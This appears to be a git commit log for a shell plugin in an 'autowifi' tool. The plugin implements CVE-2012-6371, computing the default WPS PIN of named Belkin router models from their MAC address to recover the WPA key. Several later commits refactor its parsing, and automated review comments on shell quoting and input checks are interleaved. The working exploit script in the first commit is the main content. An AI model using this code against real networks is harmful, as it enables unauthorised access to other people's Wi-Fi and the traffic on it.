From 5995257992d9b4d86313e3d78a85b68ffff0a2af Mon Sep 17 00:00:00 2001
From: makefu
Date: Sun, 26 May 2013 14:06:53 +0200
Subject: add belkin WPS plugin
---
 usr/lib/autowifi/plugins/11belkin_wps | 48 +++++++++++++++++++++++++++++++++++
 1 file changed, 48 insertions(+)
 create mode 100755 usr/lib/autowifi/plugins/11belkin_wps
(limited to 'usr/lib/autowifi/plugins/11belkin_wps')
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
new file mode 100755
index 00000000..93dd447a
--- /dev/null
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -0,0 +1,48 @@
+#!/bin/sh
+# thanks to http://ednolo.alumnos.upv.es/?p=1295G
+# for the PoC code
+# Calculates the default WPS pin of Belkin Routers and returns the WPA key
+#
+# Implementation of CVE-2012-6371
+
+# works :
+# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000
+# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000
+# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000
+
+cd $(dirname $(readlink -f $0))
+. ../lib/core
+. ../lib/wps
+parse_args $@
+
+MAC=$(printf "%s" $2| sed 's/://g')
+if [ ${#MAC} -ne 12 ] ;then
+ echo "MAC malformed"
+ exit 1
+fi
+VENDOR_MAC=${MAC:0:6}
+PRIVATE_MAC=${MAC:6:12}
+if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then
+ echo "VENDOR MAC $VENDOR_MAC not affected"
+ exit 1
+fi
+
+calc_belkin(){
+ PRIVATE_MAC=${1}
+
+ p=$((0x$PRIVATE_MAC % 10000000))
+ wps_pin_checksum(){
+ pin=$1
+ accum=0
+ while [ $pin -ne 0 ];do
+ accum=$((accum + (3 * (pin % 10)) ))
+ pin=$((pin/10))
+ accum=$((accum + pin %10 ))
+ pin=$((pin/10))
+ done
+ echo $(( (10 - accum % 10) % 10))
+ }
+ printf "%07d%d" $p $(wps_pin_checksum $p)
+ return 0
+}
+try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})
-- cgit v1.2.3
From 55d6402ac5307af7490a6c6d0607c2b20c68afa4 Mon Sep 17 00:00:00 2001
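Review bot: In the new-file hunk `@@ -0,0 +1,48 @@`, the MAC taken from `$2` is checked only for length before its last six characters are spliced into `$((0x$PRIVATE_MAC % 10000000))` in `calc_belkin`, so a 12-character value containing non-hex characters reaches arithmetic evaluation and is parsed as an expression rather than a number. Reject it beside the existing length test with `case "$MAC" in *[!0-9A-Fa-f]*) echo "MAC malformed" >&2; exit 1;; esac`. The script also declares `#!/bin/sh` while relying on `${MAC:0:6}` and `==` inside `[`, which are not POSIX and are not guaranteed by every `/bin/sh`; either change the shebang to bash or use portable forms. `$0`, `$2` and `$@` are expanded unquoted throughout, so arguments containing whitespace or glob characters are re-split.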
From: makefu
Date: Sun, 26 May 2013 14:09:11 +0200
Subject: update parser
---
 usr/lib/autowifi/plugins/11belkin_wps | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
(limited to 'usr/lib/autowifi/plugins/11belkin_wps')
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
index 93dd447a..3820cf2e 100755
--- a/usr/lib/autowifi/plugins/11belkin_wps
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -13,7 +13,7 @@
 cd $(dirname $(readlink -f $0))
 . ../lib/core
 . ../lib/wps
-parse_args $@
+parse_plugin_args $@
 MAC=$(printf "%s" $2| sed 's/://g')
 if [ ${#MAC} -ne 12 ] ;then
-- cgit v1.2.3
From 91b2ec7821796c75bb3a56df951c6734d41a26bb Mon Sep 17 00:00:00 2001
From: makefu
Date: Sun, 26 May 2013 14:41:01 +0200
Subject: cleanup and usage for plugins
---
 usr/lib/autowifi/plugins/11belkin_wps | 8 ++------
 1 file changed, 2 insertions(+), 6 deletions(-)
(limited to 'usr/lib/autowifi/plugins/11belkin_wps')
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
index 3820cf2e..1dba7377 100755
--- a/usr/lib/autowifi/plugins/11belkin_wps
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -11,15 +11,11 @@
 # belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000
 cd $(dirname $(readlink -f $0))
-. ../lib/core
+. ../lib/plugin_core
 . ../lib/wps
 parse_plugin_args $@
-MAC=$(printf "%s" $2| sed 's/://g')
-if [ ${#MAC} -ne 12 ] ;then
- echo "MAC malformed"
- exit 1
-fi
+MAC=$(printf "%s" $MAC| sed 's/://g')
 VENDOR_MAC=${MAC:0:6}
 PRIVATE_MAC=${MAC:6:12}
 if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then
-- cgit v1.2.3
From d0e92e7aa1ece7bbccedafbb1730b80c76424f07 Mon Sep 17 00:00:00 2001
From: makefu
Date: Wed, 29 May 2013 20:38:52 +0200
Subject: fix bug in 11belkin_wps whitespace in essid
---
 usr/lib/autowifi/plugins/11belkin_wps | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
(limited to 'usr/lib/autowifi/plugins/11belkin_wps')
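Review bot: The `MAC malformed` length guard is deleted in the `@@ -11,15 +11,11 @@` hunk of "cleanup and usage for plugins" and nothing visible replaces it, so `$MAC` now flows unchecked into `${MAC:0:6}`, `${MAC:6:12}` and, further down the file, the arithmetic in `calc_belkin`. Presumably `parse_plugin_args` from `../lib/plugin_core` now sets and validates `MAC`, but that library is not part of this patch. If it does not, keep a check after the colon stripping, e.g. `[ ${#MAC} -eq 12 ] || { echo "MAC malformed" >&2; exit 1; }`. The added line also leaves `$MAC` unquoted in `printf "%s" $MAC`; `printf '%s' "$MAC"` avoids word splitting and globbing.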
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
index 1dba7377..82140523 100755
--- a/usr/lib/autowifi/plugins/11belkin_wps
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -13,7 +13,7 @@
 cd $(dirname $(readlink -f $0))
 . ../lib/plugin_core
 . ../lib/wps
-parse_plugin_args $@
+parse_plugin_args "$@"
 MAC=$(printf "%s" $MAC| sed 's/://g')
 VENDOR_MAC=${MAC:0:6}
-- cgit v1.2.3
From 11d994c0a822f83b311ce9a63d1f3dc3c29c7039 Mon Sep 17 00:00:00 2001
From: makefu
Date: Wed, 26 Jun 2013 13:09:44 +0200
Subject: refactor vendor matcher
---
 usr/lib/autowifi/plugins/11belkin_wps | 9 ++-------
 1 file changed, 2 insertions(+), 7 deletions(-)
(limited to 'usr/lib/autowifi/plugins/11belkin_wps')
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
index 82140523..65e08624 100755
--- a/usr/lib/autowifi/plugins/11belkin_wps
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -15,13 +15,8 @@ cd $(dirname $(readlink -f $0))
 . ../lib/wps
 parse_plugin_args "$@"
-MAC=$(printf "%s" $MAC| sed 's/://g')
-VENDOR_MAC=${MAC:0:6}
-PRIVATE_MAC=${MAC:6:12}
-if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then
- echo "VENDOR MAC $VENDOR_MAC not affected"
- exit 1
-fi
+
+! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
 calc_belkin(){
 PRIVATE_MAC=${1}
-- cgit v1.2.3
From 7823e04b4b3f83f1efcc60f11892714b208db96c Mon Sep 17 00:00:00 2001
From: lassulus
Date: Fri, 27 Sep 2013 01:00:45 +0200
Subject: implement painmode
---
 usr/lib/autowifi/plugins/11belkin_wps | 1 +
 1 file changed, 1 insertion(+)
(limited to 'usr/lib/autowifi/plugins/11belkin_wps')
diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
index 65e08624..d4eb8e37 100755
--- a/usr/lib/autowifi/plugins/11belkin_wps
+++ b/usr/lib/autowifi/plugins/11belkin_wps
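Review bot: Quoting `"$@"` for `parse_plugin_args` in the `@@ -13,7 +13,7 @@` hunk of "fix bug in 11belkin_wps whitespace in essid" fixes only one of the places where the arguments are re-split. The last line of the file, `try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})`, was added in the first commit and lies outside this hunk; it still passes `$@` unquoted, so an ESSID containing whitespace would presumably break there as well. Change it to `try_wps_pin "$@" "$(calc_belkin "${PRIVATE_MAC}")"`. The context line `cd $(dirname $(readlink -f $0))` has the same weakness for an install path containing spaces.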
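Review bot: After the `@@ -15,13 +15,8 @@` hunk of "refactor vendor matcher", nothing at the top level of this file assigns `VENDOR_MAC` or `PRIVATE_MAC` any more, yet both are still read, here and in the final `try_wps_pin … $(calc_belkin ${PRIVATE_MAC})` line outside the hunk. The plugin therefore depends on `../lib/plugin_core` providing them, which is inferred because the library is not shown. Fail early if they are missing: `: "${VENDOR_MAC:?not set by plugin_core}" "${PRIVATE_MAC:?not set by plugin_core}"`. The `! check_vendor_mac … && echo … && exit 1` chain reads more clearly, and reports on stderr, as `if ! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B; then echo "VENDOR MAC $VENDOR_MAC not affected" >&2; exit 1; fi`.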
@@ -15,6 +15,7 @@ cd $(dirname $(readlink -f $0))
 . ../lib/wps
 parse_plugin_args "$@"
+check_painmode
 ! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
-- cgit v1.2.3